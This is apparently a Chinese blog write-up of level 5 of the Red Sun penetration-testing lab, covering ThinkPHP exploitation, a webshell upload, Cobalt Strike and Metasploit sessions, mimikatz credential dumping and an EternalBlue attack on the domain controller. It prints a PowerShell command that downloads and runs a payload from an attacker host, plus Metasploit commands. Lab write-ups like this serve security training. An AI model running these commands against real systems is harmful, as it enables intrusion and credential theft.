红日靶场第五关

红日靶场第五关

  • 可以查看我个人博客http://cllmsy.cn/与我交流,CSDN只是为了方便发图。

一、环境配置

靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。
虚拟机密码
win7
sun\heart 123.com
sun\Administrator dc123.com
# win7 web需要打开C盘里的phpstudy,最好关一下防火墙

2008
sun\admin 2020.com
Win7双网卡模拟内外网

VMnet2网卡:192.168.25.0/24 外网
VMnet10网卡:192.168.26.0/24 内网

二、目标

一、环境搭建
    1.环境搭建测试
    2.信息收集
二、漏洞利用
    3.漏洞搜索与利用
    4.漏洞利用Getshell
    5.系统信息收集
    6.主机密码收集
三、内网搜集
    7.内网--继续信息收集
    8.内网攻击姿势--MS14-058
    9.内网攻击姿势--MS17-010
四、横向移动
    10.psexec远控
    11.内网其它主机端口
    12.netsh增删防火墙规则
五、构建通道
    13.内网其它主机端口-代理转发
六、持久控制
    14.域渗透-域成员信息收集
    15.域渗透-基础服务弱口令探测及深度利用之powershell
    16.域渗透-横向移动[wmi利用]
    17.域渗透-域控实现与利用
七、痕迹清理
    18、日志清理

三、WEB外网打点

3.1 资产收集

外网IP得到为192.168.25.128,开启了80端口。

红日靶场第五关_第1张图片

3.2 Thinkphp getshell

红日靶场第五关_第2张图片

3.2.1 tp5_invoke_func_code_exec_1漏洞

红日靶场第五关_第3张图片

3.2.2 文件上传上线冰蝎

上传shell.php

红日靶场第五关_第4张图片

getshell:

红日靶场第五关_第5张图片

四、上线CS

4.1 木马后门上线

4.1.1 配置监听

开启CS

红日靶场第五关_第6张图片

配置监听

红日靶场第五关_第7张图片

攻击——生成后门——windowsExecutable(S)——用冰蝎\蚁剑上传服务器——运行

4.1.2 上线CS成功

红日靶场第五关_第8张图片

4.2 powershell上线

4.2.1 powershell命令执行

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.25.132:8899/a’))”

红日靶场第五关_第9张图片

4.3 权限提升

MS16-135提权,插件随便选的。

红日靶场第五关_第10张图片

五、内网信息收集

5.1 本机信息收集

5.1.1 判断存在域控

shell ipconfig /all

红日靶场第五关_第11张图片

5.1.2 本机网卡IP

双网卡,外网为192.168.25.131 内网为192.138.26.134

红日靶场第五关_第12张图片

5.1.3 查看其他域内主机信息

shell net view

红日靶场第五关_第13张图片

5.1.4 判断是否存在多个域

shell net view /domain

红日靶场第五关_第14张图片

5.2 ICMP内网探测

两台机子IP为:192.168.26.131 192.168.26.134(win7)

红日靶场第五关_第15张图片

红日靶场第五关_第16张图片

判断DC为192.168.26.131

5.3 端口扫描

红日靶场第五关_第17张图片

5.4 SMB端口漏洞(永恒之蓝扫描)

红日靶场第五关_第18张图片

5.5 mimikatz抓取

adiminitrator:

红日靶场第五关_第19张图片

leo:

红日靶场第五关_第20张图片

六、内网横向

6.1 psexec传递

获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalStrike本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec:在主机上使用服务派生会话 )

红日靶场第五关_第21张图片

#因为DC不出网,所以psexec传递失败,需要关闭防火墙,或者放行端口,在进行psexec传递攻击,但是我尝试了多种方法,于是决定绕一绕。

6.2 联动MSF

6.2.1 CS上线MSF

# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_https #要用https
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port>   # 设置任意端口进行监听
# 启动监听器
msf> run

下图绕了一绕。

红日靶场第五关_第22张图片

6.3 利用MS17-010永恒之蓝拿下DC

永恒之蓝配置:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

红日靶场第五关_第23张图片

成功利用:(试了很多遍,这种方法有点玄学,后续会写另一种方法)

红日靶场第五关_第24张图片

6.4 检测

红日靶场第五关_第25张图片

七、总结

这次的靶场可能搭建有点问题,中间卡了几个点,一方面是psexec传递不知道为什么上线不了CS,于是通过了联动MSF,用永恒之蓝拿下了DC域控,在清除痕迹和黄票子还没做细节操作,后续会补上缺失的操作。

你可能感兴趣的:(靶场练习,安全,网络)